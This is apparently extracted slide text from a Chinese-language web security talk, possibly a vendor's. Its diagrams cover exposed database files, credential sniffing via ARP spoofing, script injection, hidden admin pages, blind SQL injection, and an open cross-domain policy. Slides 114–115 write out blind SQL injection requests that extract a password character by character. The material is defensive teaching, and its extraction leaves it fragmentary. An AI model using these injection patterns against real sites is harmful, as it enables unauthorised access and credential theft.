  • 99. Web Server Attacker Get /config/database.mdb Database.mdb Username | password Admin admin@#$%! …
  • 100. Web Server Attacker Get /config/database.mdb Database.mdb Username | password Admin 120a1b2649c88aef29edd2ffd7359d73 …
  • 101.
  • 102.
  • 103.
  • 104.
  • 106. Post Forum Message: 用户名 : aa 密 码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa…
  • 107. Attacker 登陆成功,欢迎 aa… 登陆论坛 用户名 : aa 密 码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa… 登陆论坛 用户名 : aa 密 码 : aa_passwd
  • 108. Attacker qfw2k3vkei5vinev C lient Web Server faj2fk42iio 9fj1kjfajffj fkajlkfiefi2hffkfkff WAP 登陆论坛 用户名 : aa 密 码 : aa_passwd 登陆成功,欢迎 aa…
  • 109. Post Forum Message: 用户名 : aa 密 码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa…
  • 110. C lient Web Server Client Arp 病毒 登陆论坛 用户名 : aa 密 码 : aa_passwd <script> evil code </script> 登陆论坛 用户名 : aa 密 码 : aa_passwd
  • 111. Evil Attacked! C lient Web Server 登陆成功,欢迎 aa… <script>evil code</script> 登陆成功,欢迎 aa… Client Arp 病毒
  • 113. Get /afalkjfla/admin123.php C lient Web Server 登陆管理界面成功,欢迎 admin 回家…
  • 114. Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= joe’ and LEFT(password,2)=‘f … 1. 判断注入点 2. 探测密码长度 MYSQL SERVER!! 密码长 13 位 密码是 ilovepassword 3. 探测密码 Attacker Web Server FALSE TRUE FALSE
  • 115. Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= joe’ and LEFT(password,2)=‘f … 1. 判断注入点 2. 探测密码长度 MYSQL SERVER!! 密码长 13 位 密码是 ilovepassword 3. 探测密码 4. 寻找后台登陆页面 Attacker Web Server FALSE TRUE FALSE
  • 117.
  • 118. <cross-domain-policy> <allow-access-from domain=&quot;*&quot;/> </cross-domain-policy> Open API Vulnerable
  • 120. register_globals magic_quotes 开源社区的努力 安全厂商的努力 软件厂商的努力 微软 Google 绿盟 safe_mode PHP … … 极光 弱点防护领域的领导者
  • 122.
  • 123.
  • 124.
  • 125.
  • 126.  
  • 127. Professional Security Solution Provider Thanks!